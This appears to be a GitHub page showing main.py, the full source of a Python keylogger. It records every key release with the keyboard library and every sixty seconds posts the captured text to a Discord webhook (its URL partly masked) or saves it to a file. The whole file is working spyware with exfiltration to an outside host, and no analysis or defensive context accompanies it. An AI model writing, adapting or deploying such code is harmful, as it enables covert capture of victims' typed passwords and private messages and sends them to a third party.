-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmain.py
More file actions
84 lines (74 loc) · 2.78 KB
/
main.py
File metadata and controls
84 lines (74 loc) · 2.78 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
import requests
import keyboard
from datetime import datetime
from threading import Timer
### CAPITAL LETTERS DETECTION MAY HAVE ERROR BECAUSE WILL FIGURE THAT WE START IN lowercase###
webHookURL = "https://discord.com/api/webhooks/10363****/8dh4bKBEwfYFWx2hn40yoSM***"
REPORT_METH = "discord"
REPORT_INTERVAL = 60 # SECONDS
class Keylogger:
def __init__(self, interval, report_method):
self.interval = interval
self.report_method = report_method
self.start_recording = datetime.now()
self.end_recording = datetime.now()
self.log = ""
def callback(self, event):
mayusEnabled = False
name = event.name
if len(name) > 1:
if name == "enter":
name = "[ENTER]\n"
elif name == "space":
name = " "
elif name == "shift":
name = "[SHIFT]"
elif name == "caps lock":
if mayusEnabled:
mayusEnabled = False
else:
mayusEnabled = True
name = "[MAYUS]"
else:
name = name.replace(" ", "_")
if mayusEnabled:
name = f"{name.upper()}"
else:
name = f"{name}"
self.log += name
def start(self):
self.start_recording = datetime.now()
keyboard.on_release(callback=self.callback)
self.report()
print(f"{datetime.now()} - Started keylogger")
keyboard.wait()
def create_filename(self):
start_recording_str = str(self.start_recording)[:-7].replace(" ", "-").replace(":", "")
end_recording_str = str(self.end_recording)[:-7].replace(" ", "-").replace(":", "")
self.filename = f"keylog-{start_recording_str}_{end_recording_str}"
def report_to_file(self):
with open(f"{self.filename}.txt", "w") as f:
print(self.log, file=f)
print(f"Saved {self.filename}.txt")
def report_to_discord(self):
data = {"content": self.log}
response = requests.post(webHookURL, json=data)
print(response.status_code)
print(response.content)
def report(self):
if self.log:
self.end_recording = datetime.now()
self.create_filename()
if self.report_method == "file":
self.report_to_file()
elif self.report_method == "discord":
self.report_to_discord()
print(f"[{self.filename}] - {self.log}")
self.start_recording = datetime.now()
self.log = ""
timer = Timer(interval=self.interval, function=self.report)
timer.daemon = True
timer.start()
if __name__ == "__main__":
keylogger = Keylogger(interval=REPORT_INTERVAL, report_method=REPORT_METH)
keylogger.start()